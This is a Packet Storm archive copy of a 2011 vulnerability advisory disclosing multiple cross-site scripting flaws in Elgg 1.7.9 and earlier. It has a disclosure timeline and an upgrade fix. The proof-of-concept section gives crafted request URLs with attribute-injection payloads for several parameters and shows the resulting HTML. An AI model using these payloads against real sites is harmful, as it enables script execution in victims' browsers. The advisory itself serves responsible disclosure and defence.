exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Elgg 1.7.9 Cross Site Scripting

Elgg 1.7.9 Cross Site Scripting
Posted Jul 31, 2011
Authored by Aung Khant | Site yehg.net

Elgg versions 1.7.9 and below suffer from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
SHA-256 | 7d3524447fb644b9d0060ad234e6ad25c76acf7d2c752d60db219a95d7ecf093

Elgg 1.7.9 Cross Site Scripting

Change Mirror Download
Elgg 1.7.9 <= | Multiple Cross Site Scripting Vulnerabilities



1. OVERVIEW

The Elgg 1.7.9 and lower versions are vulnerable to multiple Cross
Site Scripting.


2. BACKGROUND

Elgg is an award-winning social networking engine, delivering the
building blocks that enable businesses, schools, universities and
associations to create their own fully-featured social networks and
applications. Well-known Organizations with networks powered by Elgg
include: Australian Government, British Government, Federal Canadian
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,
Johns Hopkins University and more (http://elgg.org/powering.php)


3. VULNERABILITY DESCRIPTION

Several parameters (page_owner, content,internalname, QUERY_STRING)
are not properly sanitized, which allows attacker to conduct Cross
Site Scripting attack. This may allow an attacker to create a
specially crafted URL that would execute arbitrary script code in a
victim's browser.


4. VERSIONS AFFECTED

Elgg 1.7.9 <=


5. PROOF-OF-CONCEPT/EXPLOIT


XSS (Browser All)

N.B. User login is required to execute.

vulnerable parameters: page_owner, content,internalname, QUERY_STRING
______________________________________________________________________________________________

REQUEST:

http://localhost/elgg/mod/file/search.php?subtype=file&page_owner=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f

http://localhost/elgg/mod/riverdashboard/?content=%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22%20onmouseover%3d%22alert%28/XSS/%29%22%20x=%22f&callback=true

http://localhost/elgg/pg/embed/upload?internalname=%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22

http://localhost/elgg/pg/pages/edit/%22%20onmouseover%3d%22alert%28%27XSS%27%29%22%20style%3d%22position:fixed;width:1000px;height:1000px;display:block;left:0;top:0%22


XSS (Exploitable in Older versions of Browsers - IE/FF)
vulnerable parameters: send_to,container_guid
=========================================================

REQUEST:

http://localhost/elgg/pg/messages/compose/?send_to=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22s


Portion of RESPONSE:

<input type="hidden" name="send_to" value=""
style="background-image:url(javascript:alert(/XSS/))" x="s" />


REQUEST:

http://localhost/elgg/pg/pages/new/?container_guid=%22%20style%3d%22background-image%3aurl%28javascript:alert%28/XSS/%29%29%22%20x=%22


Portion of RESPONSE:

<input type="hidden" name="container_guid" value=""
style="background-image:url(javascript:alert(/XSS/))" x="s" />



6. SOLUTION

Upgrade to 1.7.10 or higher.


7. VENDOR

Curverider Ltd
http://www.curverider.co.uk/
http://elgg.org/


8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2011-06-09: vulnerability reported
2011-06-14: vendor released fixed version
2011-07-30: vulnerability disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[elgg_179]_cross_site_scripting
Project Home: http://elgg.org/
XSS (owasp): http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
CWE-79: http://cwe.mitre.org/data/definitions/79.html


#yehg [2011-07-30]


---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close